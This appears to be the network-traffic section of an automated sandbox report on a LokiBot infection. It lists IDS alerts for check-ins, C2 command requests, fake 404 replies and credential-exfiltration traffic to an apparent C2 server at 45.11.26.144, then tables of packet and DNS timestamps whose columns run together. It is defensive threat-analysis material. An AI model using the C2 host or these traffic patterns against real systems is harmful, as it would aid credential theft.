                192.168.2.645.11.26.14449820802024313 08/05/22-09:11:55.767753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449808802024318 08/05/22-09:11:29.964196TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449772802024313 08/05/22-09:10:49.248779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449814802024313 08/05/22-09:11:41.090702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449770802024318 08/05/22-09:10:43.512599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449768802025381 08/05/22-09:10:38.844396TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449767802024317 08/05/22-09:10:33.531418TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976780192.168.2.645.11.26.144
                192.168.2.68.8.8.860350532014169 08/05/22-09:10:43.391431UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6035053192.168.2.68.8.8.8
                192.168.2.645.11.26.14449876802825766 08/05/22-09:12:15.818317TCP2825766ETPRO TROJAN LokiBot Checkin M24987680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449771802025381 08/05/22-09:10:46.236811TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449816802021641 08/05/22-09:11:45.230367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449770802024313 08/05/22-09:10:43.512599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497952025483 08/05/22-09:11:10.306523TCP2025483ET TROJAN LokiBot Fake 404 Response804979545.11.26.144192.168.2.6
                192.168.2.645.11.26.14449767802024312 08/05/22-09:10:33.531418TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449797802021641 08/05/22-09:11:13.734140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497972025483 08/05/22-09:11:14.894982TCP2025483ET TROJAN LokiBot Fake 404 Response804979745.11.26.144192.168.2.6
                45.11.26.144192.168.2.680497912025483 08/05/22-09:11:06.091189TCP2025483ET TROJAN LokiBot Fake 404 Response804979145.11.26.144192.168.2.6
                192.168.2.645.11.26.14449804802024313 08/05/22-09:11:20.056413TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449880802021641 08/05/22-09:12:19.118779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449883802024318 08/05/22-09:12:25.116712TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498122025483 08/05/22-09:11:36.832118TCP2025483ET TROJAN LokiBot Fake 404 Response804981245.11.26.144192.168.2.6
                192.168.2.645.11.26.14449804802024318 08/05/22-09:11:20.056413TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449883802024313 08/05/22-09:12:25.116712TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498142025483 08/05/22-09:11:42.316827TCP2025483ET TROJAN LokiBot Fake 404 Response804981445.11.26.144192.168.2.6
                45.11.26.144192.168.2.680498162025483 08/05/22-09:11:46.446493TCP2025483ET TROJAN LokiBot Fake 404 Response804981645.11.26.144192.168.2.6
                192.168.2.645.11.26.14449769802021641 08/05/22-09:10:41.114928TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.645.11.26.144
                192.168.2.645.11.26.14449771802825766 08/05/22-09:10:46.236811TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497992025483 08/05/22-09:11:18.985893TCP2025483ET TROJAN LokiBot Fake 404 Response804979945.11.26.144192.168.2.6
                192.168.2.645.11.26.14449806802021641 08/05/22-09:11:25.288207TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449774802021641 08/05/22-09:10:53.861086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449812802024313 08/05/22-09:11:35.695582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449787802021641 08/05/22-09:10:58.658888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449869802021641 08/05/22-09:12:11.819483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498812025483 08/05/22-09:12:23.851052TCP2025483ET TROJAN LokiBot Fake 404 Response804988145.11.26.144192.168.2.6
                192.168.2.645.11.26.14449812802024318 08/05/22-09:11:35.695582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449788802825766 08/05/22-09:11:01.711456TCP2825766ETPRO TROJAN LokiBot Checkin M24978880192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498832025483 08/05/22-09:12:26.294071TCP2025483ET TROJAN LokiBot Fake 404 Response804988345.11.26.144192.168.2.6
                192.168.2.645.11.26.14449811802021641 08/05/22-09:11:33.059063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449775802024313 08/05/22-09:10:56.189285TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.645.11.26.144
                192.168.2.68.8.8.857422532014169 08/05/22-09:12:15.716804UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5742253192.168.2.68.8.8.8
                192.168.2.645.11.26.14449775802024318 08/05/22-09:10:56.189285TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.645.11.26.144
                192.168.2.68.8.8.861116532014169 08/05/22-09:10:49.152167UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6111653192.168.2.68.8.8.8
                192.168.2.645.11.26.14449788802025381 08/05/22-09:11:01.711456TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.645.11.26.144
                192.168.2.68.8.8.852089532014169 08/05/22-09:11:09.042075UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5208953192.168.2.68.8.8.8
                192.168.2.645.11.26.14449820802825766 08/05/22-09:11:55.767753TCP2825766ETPRO TROJAN LokiBot Checkin M24982080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449860802024313 08/05/22-09:12:05.554361TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449799802021641 08/05/22-09:11:17.792361TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497882025483 08/05/22-09:11:02.864394TCP2025483ET TROJAN LokiBot Fake 404 Response804978845.11.26.144192.168.2.6
                192.168.2.68.8.8.850081532014169 08/05/22-09:11:19.957970UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5008153192.168.2.68.8.8.8
                192.168.2.645.11.26.14449773802025381 08/05/22-09:10:51.481984TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449860802024318 08/05/22-09:12:05.554361TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449795802024313 08/05/22-09:11:09.138567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.645.11.26.144
                192.168.2.645.11.26.14449832802024313 08/05/22-09:12:00.816507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449795802024318 08/05/22-09:11:09.138567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.645.11.26.144
                192.168.2.68.8.8.857269532014169 08/05/22-09:12:22.498824UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5726953192.168.2.68.8.8.8
                192.168.2.645.11.26.14449768802825766 08/05/22-09:10:38.844396TCP2825766ETPRO TROJAN LokiBot Checkin M24976880192.168.2.645.11.26.144
                192.168.2.68.8.8.856591532014169 08/05/22-09:10:41.016166UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5659153192.168.2.68.8.8.8
                192.168.2.645.11.26.14449881802025381 08/05/22-09:12:22.599825TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449808802021641 08/05/22-09:11:29.964196TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449823802025381 08/05/22-09:11:58.081188TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.645.11.26.144
                192.168.2.68.8.8.861607532014169 08/05/22-09:10:56.080751UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6160753192.168.2.68.8.8.8
                45.11.26.144192.168.2.680498462025483 08/05/22-09:12:04.472524TCP2025483ET TROJAN LokiBot Fake 404 Response804984645.11.26.144192.168.2.6
                192.168.2.645.11.26.14449772802021641 08/05/22-09:10:49.248779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.645.11.26.144
                192.168.2.68.8.8.851666532014169 08/05/22-09:10:58.559114UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5166653192.168.2.68.8.8.8
                192.168.2.645.11.26.14449791802825766 08/05/22-09:11:04.815056TCP2825766ETPRO TROJAN LokiBot Checkin M24979180192.168.2.645.11.26.144
                192.168.2.68.8.8.862643532014169 08/05/22-09:11:04.707423UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6264353192.168.2.68.8.8.8
                45.11.26.144192.168.2.680498602025483 08/05/22-09:12:06.810702TCP2025483ET TROJAN LokiBot Fake 404 Response804986045.11.26.144192.168.2.6
                192.168.2.645.11.26.14449814802021641 08/05/22-09:11:41.090702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449832802024318 08/05/22-09:12:00.816507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449773802024318 08/05/22-09:10:51.481984TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449816802024313 08/05/22-09:11:45.230367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497712025483 08/05/22-09:10:47.482676TCP2025483ET TROJAN LokiBot Fake 404 Response804977145.11.26.144192.168.2.6
                192.168.2.645.11.26.14449773802024313 08/05/22-09:10:51.481984TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449804802021641 08/05/22-09:11:20.056413TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449816802024318 08/05/22-09:11:45.230367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449813802021641 08/05/22-09:11:38.357337TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449808802025381 08/05/22-09:11:29.964196TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.645.11.26.144
                192.168.2.68.8.8.859106532014169 08/05/22-09:11:53.220746UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5910653192.168.2.68.8.8.8
                192.168.2.68.8.8.849463532014169 08/05/22-09:12:03.092143UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4946353192.168.2.68.8.8.8
                192.168.2.645.11.26.14449775802825766 08/05/22-09:10:56.189285TCP2825766ETPRO TROJAN LokiBot Checkin M24977580192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497732025483 08/05/22-09:10:52.735646TCP2025483ET TROJAN LokiBot Fake 404 Response804977345.11.26.144192.168.2.6
                45.11.26.144192.168.2.680497742025483 08/05/22-09:10:55.059781TCP2025483ET TROJAN LokiBot Fake 404 Response804977445.11.26.144192.168.2.6
                192.168.2.645.11.26.14449883802021641 08/05/22-09:12:25.116712TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449818802025381 08/05/22-09:11:53.331696TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449823802021641 08/05/22-09:11:58.081188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449806802024313 08/05/22-09:11:25.288207TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449881802024318 08/05/22-09:12:22.599825TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449806802024318 08/05/22-09:11:25.288207TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449876802024313 08/05/22-09:12:15.818317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.645.11.26.144
                192.168.2.68.8.8.852698532014169 08/05/22-09:11:13.360201UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5269853192.168.2.68.8.8.8
                192.168.2.645.11.26.14449787802024313 08/05/22-09:10:58.658888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449881802024313 08/05/22-09:12:22.599825TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449820802025381 08/05/22-09:11:55.767753TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449869802024318 08/05/22-09:12:11.819483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.645.11.26.144
                192.168.2.645.11.26.14449787802024318 08/05/22-09:10:58.658888TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449869802024313 08/05/22-09:12:11.819483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.645.11.26.144
                192.168.2.645.11.26.14449813802825766 08/05/22-09:11:38.357337TCP2825766ETPRO TROJAN LokiBot Checkin M24981380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449876802024318 08/05/22-09:12:15.818317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449775802021641 08/05/22-09:10:56.189285TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.645.11.26.144
                192.168.2.68.8.8.855083532014169 08/05/22-09:11:38.248653UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5508353192.168.2.68.8.8.8
                45.11.26.144192.168.2.680498692025483 08/05/22-09:12:13.145529TCP2025483ET TROJAN LokiBot Fake 404 Response804986945.11.26.144192.168.2.6
                192.168.2.645.11.26.14449883802825766 08/05/22-09:12:25.116712TCP2825766ETPRO TROJAN LokiBot Checkin M24988380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449791802025381 08/05/22-09:11:04.815056TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449768802024312 08/05/22-09:10:38.844396TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449799802024318 08/05/22-09:11:17.792361TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.645.11.26.144
                192.168.2.68.8.8.849520532014169 08/05/22-09:11:25.186861UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4952053192.168.2.68.8.8.8
                192.168.2.645.11.26.14449768802024317 08/05/22-09:10:38.844396TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449774802024313 08/05/22-09:10:53.861086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497872025483 08/05/22-09:10:59.837244TCP2025483ET TROJAN LokiBot Fake 404 Response804978745.11.26.144192.168.2.6
                192.168.2.645.11.26.14449860802021641 08/05/22-09:12:05.554361TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449832802825766 08/05/22-09:12:00.816507TCP2825766ETPRO TROJAN LokiBot Checkin M24983280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449774802024318 08/05/22-09:10:53.861086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449771802021641 08/05/22-09:10:46.236811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449799802024313 08/05/22-09:11:17.792361TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.645.11.26.144
                192.168.2.645.11.26.14449880802025381 08/05/22-09:12:19.118779TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.645.11.26.144
                192.168.2.68.8.8.851748532014169 08/05/22-09:10:45.856847UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5174853192.168.2.68.8.8.8
                192.168.2.645.11.26.14449823802825766 08/05/22-09:11:58.081188TCP2825766ETPRO TROJAN LokiBot Checkin M24982380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449797802825766 08/05/22-09:11:13.734140TCP2825766ETPRO TROJAN LokiBot Checkin M24979780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449832802021641 08/05/22-09:12:00.816507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.645.11.26.144
                192.168.2.68.8.8.853049532014169 08/05/22-09:11:29.434938UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5304953192.168.2.68.8.8.8
                45.11.26.144192.168.2.680498802025483 08/05/22-09:12:20.337044TCP2025483ET TROJAN LokiBot Fake 404 Response804988045.11.26.144192.168.2.6
                192.168.2.645.11.26.14449846802025381 08/05/22-09:12:03.190477TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449811802025381 08/05/22-09:11:33.059063TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449804802825766 08/05/22-09:11:20.056413TCP2825766ETPRO TROJAN LokiBot Checkin M24980480192.168.2.645.11.26.144
                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 09:10:33.452760935 CEST4976780192.168.2.645.11.26.144
                Aug 5, 2022 09:10:33.528168917 CEST804976745.11.26.144192.168.2.6
                Aug 5, 2022 09:10:33.528290987 CEST4976780192.168.2.645.11.26.144
                Aug 5, 2022 09:10:33.531418085 CEST4976780192.168.2.645.11.26.144
                Aug 5, 2022 09:10:33.606997967 CEST804976745.11.26.144192.168.2.6
                Aug 5, 2022 09:10:33.607110023 CEST4976780192.168.2.645.11.26.144
                Aug 5, 2022 09:10:33.681927919 CEST804976745.11.26.144192.168.2.6
                Aug 5, 2022 09:10:34.839971066 CEST804976745.11.26.144192.168.2.6
                Aug 5, 2022 09:10:34.840152979 CEST4976780192.168.2.645.11.26.144
                Aug 5, 2022 09:10:34.865029097 CEST4976780192.168.2.645.11.26.144
                Aug 5, 2022 09:10:34.941829920 CEST804976745.11.26.144192.168.2.6
                Aug 5, 2022 09:10:38.757756948 CEST4976880192.168.2.645.11.26.144
                Aug 5, 2022 09:10:38.840666056 CEST804976845.11.26.144192.168.2.6
                Aug 5, 2022 09:10:38.840790033 CEST4976880192.168.2.645.11.26.144
                Aug 5, 2022 09:10:38.844396114 CEST4976880192.168.2.645.11.26.144
                Aug 5, 2022 09:10:38.919801950 CEST804976845.11.26.144192.168.2.6
                Aug 5, 2022 09:10:38.919878960 CEST4976880192.168.2.645.11.26.144
                Aug 5, 2022 09:10:38.995052099 CEST804976845.11.26.144192.168.2.6
                Aug 5, 2022 09:10:40.015507936 CEST804976845.11.26.144192.168.2.6
                Aug 5, 2022 09:10:40.016172886 CEST4976880192.168.2.645.11.26.144
                Aug 5, 2022 09:10:40.016252995 CEST4976880192.168.2.645.11.26.144
                Aug 5, 2022 09:10:40.092750072 CEST804976845.11.26.144192.168.2.6
                Aug 5, 2022 09:10:41.037389040 CEST4976980192.168.2.645.11.26.144
                Aug 5, 2022 09:10:41.111990929 CEST804976945.11.26.144192.168.2.6
                Aug 5, 2022 09:10:41.112158060 CEST4976980192.168.2.645.11.26.144
                Aug 5, 2022 09:10:41.114928007 CEST4976980192.168.2.645.11.26.144
                Aug 5, 2022 09:10:41.189064026 CEST804976945.11.26.144192.168.2.6
                Aug 5, 2022 09:10:41.189163923 CEST4976980192.168.2.645.11.26.144
                Aug 5, 2022 09:10:41.262840986 CEST804976945.11.26.144192.168.2.6
                Aug 5, 2022 09:10:42.315303087 CEST804976945.11.26.144192.168.2.6
                Aug 5, 2022 09:10:42.315426111 CEST4976980192.168.2.645.11.26.144
                Aug 5, 2022 09:10:42.319513083 CEST4976980192.168.2.645.11.26.144
                Aug 5, 2022 09:10:42.393865108 CEST804976945.11.26.144192.168.2.6
                Aug 5, 2022 09:10:43.419495106 CEST4977080192.168.2.645.11.26.144
                Aug 5, 2022 09:10:43.494263887 CEST804977045.11.26.144192.168.2.6
                Aug 5, 2022 09:10:43.494424105 CEST4977080192.168.2.645.11.26.144
                Aug 5, 2022 09:10:43.512598991 CEST4977080192.168.2.645.11.26.144
                Aug 5, 2022 09:10:43.586875916 CEST804977045.11.26.144192.168.2.6
                Aug 5, 2022 09:10:43.587035894 CEST4977080192.168.2.645.11.26.144
                Aug 5, 2022 09:10:43.660896063 CEST804977045.11.26.144192.168.2.6
                Aug 5, 2022 09:10:44.657387018 CEST804977045.11.26.144192.168.2.6
                Aug 5, 2022 09:10:44.657515049 CEST4977080192.168.2.645.11.26.144
                Aug 5, 2022 09:10:44.657567024 CEST4977080192.168.2.645.11.26.144
                Aug 5, 2022 09:10:44.733688116 CEST804977045.11.26.144192.168.2.6
                Aug 5, 2022 09:10:46.151734114 CEST4977180192.168.2.645.11.26.144
                Aug 5, 2022 09:10:46.226156950 CEST804977145.11.26.144192.168.2.6
                Aug 5, 2022 09:10:46.226257086 CEST4977180192.168.2.645.11.26.144
                Aug 5, 2022 09:10:46.236810923 CEST4977180192.168.2.645.11.26.144
                Aug 5, 2022 09:10:46.311299086 CEST804977145.11.26.144192.168.2.6
                Aug 5, 2022 09:10:46.311403036 CEST4977180192.168.2.645.11.26.144
                Aug 5, 2022 09:10:46.386507034 CEST804977145.11.26.144192.168.2.6
                Aug 5, 2022 09:10:47.482676029 CEST804977145.11.26.144192.168.2.6
                Aug 5, 2022 09:10:47.482801914 CEST4977180192.168.2.645.11.26.144
                Aug 5, 2022 09:10:47.482856035 CEST4977180192.168.2.645.11.26.144
                Aug 5, 2022 09:10:47.557245970 CEST804977145.11.26.144192.168.2.6
                Aug 5, 2022 09:10:49.171407938 CEST4977280192.168.2.645.11.26.144
                Aug 5, 2022 09:10:49.245950937 CEST804977245.11.26.144192.168.2.6
                Aug 5, 2022 09:10:49.246045113 CEST4977280192.168.2.645.11.26.144
                Aug 5, 2022 09:10:49.248779058 CEST4977280192.168.2.645.11.26.144
                Aug 5, 2022 09:10:49.324110985 CEST804977245.11.26.144192.168.2.6
                Aug 5, 2022 09:10:49.324320078 CEST4977280192.168.2.645.11.26.144
                Aug 5, 2022 09:10:49.399044991 CEST804977245.11.26.144192.168.2.6
                Aug 5, 2022 09:10:50.403893948 CEST804977245.11.26.144192.168.2.6
                Aug 5, 2022 09:10:50.404051065 CEST4977280192.168.2.645.11.26.144
                Aug 5, 2022 09:10:50.404097080 CEST4977280192.168.2.645.11.26.144
                Aug 5, 2022 09:10:50.478965044 CEST804977245.11.26.144192.168.2.6
                Aug 5, 2022 09:10:51.402225018 CEST4977380192.168.2.645.11.26.144
                Aug 5, 2022 09:10:51.478199959 CEST804977345.11.26.144192.168.2.6
                Aug 5, 2022 09:10:51.478338003 CEST4977380192.168.2.645.11.26.144
                Aug 5, 2022 09:10:51.481983900 CEST4977380192.168.2.645.11.26.144
                Aug 5, 2022 09:10:51.557670116 CEST804977345.11.26.144192.168.2.6
                Aug 5, 2022 09:10:51.557755947 CEST4977380192.168.2.645.11.26.144
                Aug 5, 2022 09:10:51.633200884 CEST804977345.11.26.144192.168.2.6
                Aug 5, 2022 09:10:52.735646009 CEST804977345.11.26.144192.168.2.6
                Aug 5, 2022 09:10:52.735959053 CEST4977380192.168.2.645.11.26.144
                Aug 5, 2022 09:10:52.735996962 CEST4977380192.168.2.645.11.26.144
                Aug 5, 2022 09:10:52.811094046 CEST804977345.11.26.144192.168.2.6
                Aug 5, 2022 09:10:53.781975985 CEST4977480192.168.2.645.11.26.144
                Aug 5, 2022 09:10:53.855052948 CEST804977445.11.26.144192.168.2.6
                Aug 5, 2022 09:10:53.855231047 CEST4977480192.168.2.645.11.26.144
                Aug 5, 2022 09:10:53.861085892 CEST4977480192.168.2.645.11.26.144
                Aug 5, 2022 09:10:53.934499025 CEST804977445.11.26.144192.168.2.6
                Aug 5, 2022 09:10:53.934623957 CEST4977480192.168.2.645.11.26.144
                Aug 5, 2022 09:10:54.008326054 CEST804977445.11.26.144192.168.2.6
                Aug 5, 2022 09:10:55.059781075 CEST804977445.11.26.144192.168.2.6
                Aug 5, 2022 09:10:55.061908960 CEST4977480192.168.2.645.11.26.144
                Aug 5, 2022 09:10:55.061940908 CEST4977480192.168.2.645.11.26.144
                Aug 5, 2022 09:10:55.135668993 CEST804977445.11.26.144192.168.2.6
                Aug 5, 2022 09:10:56.107939005 CEST4977580192.168.2.645.11.26.144
                Aug 5, 2022 09:10:56.184689045 CEST804977545.11.26.144192.168.2.6
                Aug 5, 2022 09:10:56.184830904 CEST4977580192.168.2.645.11.26.144
                Aug 5, 2022 09:10:56.189285040 CEST4977580192.168.2.645.11.26.144
                Aug 5, 2022 09:10:56.264949083 CEST804977545.11.26.144192.168.2.6
                Aug 5, 2022 09:10:56.265058994 CEST4977580192.168.2.645.11.26.144
                Aug 5, 2022 09:10:56.340533018 CEST804977545.11.26.144192.168.2.6
                Aug 5, 2022 09:10:57.419936895 CEST804977545.11.26.144192.168.2.6
                Aug 5, 2022 09:10:57.420064926 CEST4977580192.168.2.645.11.26.144
                Aug 5, 2022 09:10:57.420097113 CEST4977580192.168.2.645.11.26.144
                Aug 5, 2022 09:10:57.495559931 CEST804977545.11.26.144192.168.2.6
                Aug 5, 2022 09:10:58.579468012 CEST4978780192.168.2.645.11.26.144
                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 09:10:33.085999012 CEST5872353192.168.2.68.8.8.8
                Aug 5, 2022 09:10:33.426615000 CEST53587238.8.8.8192.168.2.6
                Aug 5, 2022 09:10:38.737056017 CEST5197153192.168.2.68.8.8.8
                Aug 5, 2022 09:10:38.756499052 CEST53519718.8.8.8192.168.2.6
                Aug 5, 2022 09:10:41.016165972 CEST5659153192.168.2.68.8.8.8
                Aug 5, 2022 09:10:41.035986900 CEST53565918.8.8.8192.168.2.6
                Aug 5, 2022 09:10:43.391431093 CEST6035053192.168.2.68.8.8.8
                Aug 5, 2022 09:10:43.411323071 CEST53603508.8.8.8192.168.2.6
                Aug 5, 2022 09:10:45.856847048 CEST5174853192.168.2.68.8.8.8
                Aug 5, 2022 09:10:46.150372028 CEST53517488.8.8.8192.168.2.6
                Aug 5, 2022 09:10:49.152167082 CEST6111653192.168.2.68.8.8.8
                Aug 5, 2022 09:10:49.169785976 CEST53611168.8.8.8192.168.2.6
                Aug 5, 2022 09:10:51.380842924 CEST5095853192.168.2.68.8.8.8
                Aug 5, 2022 09:10:51.400732994 CEST53509588.8.8.8192.168.2.6
                Aug 5, 2022 09:10:53.761003971 CEST4969553192.168.2.68.8.8.8
                Aug 5, 2022 09:10:53.780385971 CEST53496958.8.8.8192.168.2.6
                Aug 5, 2022 09:10:56.080750942 CEST6160753192.168.2.68.8.8.8
                Aug 5, 2022 09:10:56.100101948 CEST53616078.8.8.8192.168.2.6
                Aug 5, 2022 09:10:58.559113979 CEST5166653192.168.2.68.8.8.8
                Aug 5, 2022 09:10:58.576757908 CEST53516668.8.8.8192.168.2.6
                Aug 5, 2022 09:11:01.609616041 CEST5703753192.168.2.68.8.8.8
